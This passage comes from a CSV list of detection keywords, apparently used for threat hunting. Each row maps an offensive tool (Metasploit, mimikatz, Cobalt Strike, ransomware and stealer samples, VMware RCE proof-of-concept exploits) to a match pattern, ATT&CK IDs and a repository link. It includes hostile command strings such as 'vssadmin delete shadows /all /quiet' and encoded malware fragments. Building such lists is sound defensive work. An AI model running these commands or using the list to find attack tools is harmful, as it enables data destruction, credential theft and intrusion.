security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vmware_vrni_rce_cve_2023_20887.rb*",".{0,1000}vmware_vrni_rce_cve_2023_20887\.rb.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","226","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "*vmware_workspace_one_access_cve_*.rb",".{0,1000}vmware_workspace_one_access_cve_.{0,1000}\.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*VMware-vRealize-Log-Insight.cert*",".{0,1000}VMware\-vRealize\-Log\-Insight\.cert.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - 
T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*vmx2john.py*",".{0,1000}vmx2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw*",".{0,1000}VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*vnc_password_osx.md*",".{0,1000}vnc_password_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vnc_passwords.txt*",".{0,1000}vnc_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vncdumpdll*",".{0,1000}vncdumpdll.{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vncinject.rb*",".{0,1000}vncinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*VNC-NoAuth -ComputerName * -Port *",".{0,1000}VNC\-NoAuth\s\-ComputerName\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*vncpcap2john.*",".{0,1000}vncpcap2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*vncpwdump.*",".{0,1000}vncpwdump\..{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vnperistence.py*",".{0,1000}vnperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*VoidFunc is an exported function used with PowerSploit's Invoke-ReflectivePEInjection.ps1*",".{0,1000}VoidFunc\sis\san\sexported\sfunction\sused\swith\sPowerSploit\'s\sInvoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*Volumiser.exe --image*",".{0,1000}Volumiser\.exe\s\-\-image.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*Volumiser\DiscUtils.Ebs\EbsMappedStream*",".{0,1000}Volumiser\\DiscUtils\.Ebs\\EbsMappedStream.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI 
for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*voukatas/Commander*",".{0,1000}voukatas\/Commander.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*VPNPivot*",".{0,1000}VPNPivot.{0,1000}","offensive_tool_keyword","VPNPivot","Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ... etc","T1090 - T1095 - T1562 - T1201 - T1558","TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0x36/VPNPivot","1","1","N/A","N/A","3","262","47","2016-07-21T08:49:26Z","2015-08-26T18:44:42Z" "*v-Q8Q~fEXAMPLEEXAMPLEDsmKpQw_Wwd57-albMZ*",".{0,1000}v\-Q8Q\~fEXAMPLEEXAMPLEDsmKpQw_Wwd57\-albMZ.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*vRealizeLogInsightRCE*",".{0,1000}vRealizeLogInsightRCE.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize 
Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*vssadmin delete shadows /all /quiet >nul*",".{0,1000}vssadmin\sdelete\sshadows\s\/all\s\/quiet\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*vssadmin delete shadows /for=%systemdrive% /all /quiet*",".{0,1000}vssadmin\sdelete\sshadows\s\/for\=\%systemdrive\%\s\/all\s\/quiet.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*vssenum.x64.*",".{0,1000}vssenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*vssenum.x86.*",".{0,1000}vssenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*vtiger_crm_upload_exploit*",".{0,1000}vtiger_crm_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*vulfocus/spring-core-rce-*",".{0,1000}vulfocus\/spring\-core\-rce\-.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*vulmon*Vulmap*",".{0,1000}vulmon.{0,1000}Vulmap.{0,1000}","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. 
they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability scanner","https://github.com/vulmon/Vulmap","1","1","N/A","10","10","920","195","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z" "*Vulnerabilities/RPCDump*",".{0,1000}Vulnerabilities\/RPCDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Vulnerable Web Enrollment endpoint identified: http://*/certsrv/certsnsh.asp*",".{0,1000}Vulnerable\sWeb\sEnrollment\sendpoint\sidentified\:\shttp\:\/\/.{0,1000}\/certsrv\/certsnsh\.asp.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*vulnfactory.org/exploits/*.c*",".{0,1000}vulnfactory\.org\/exploits\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*vulns/apache.txt*",".{0,1000}vulns\/apache\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulns/iis.txt*",".{0,1000}vulns\/iis\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulns/jrun.txt*",".{0,1000}vulns\/jrun\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulns/tomcat.txt*",".{0,1000}vulns\/tomcat\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulnweb.com/FUZZ*",".{0,1000}vulnweb\.com\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vu-ls/Crassus*",".{0,1000}vu\-ls\/Crassus.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" 
"*VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h*",".{0,1000}VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ*",".{0,1000}VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*vyrus001/go-mimikatz*",".{0,1000}vyrus001\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","598","103","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" "*vysecurity*",".{0,1000}vysecurity.{0,1000}","offensive_tool_keyword","Github Username","github username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/vysecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vysecurity/ANGRYPUPPY*",".{0,1000}vysecurity\/ANGRYPUPPY.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*-w *wordlists*.txt*",".{0,1000}\-w\s.{0,1000}wordlists.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2'*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2',*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\',.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" 
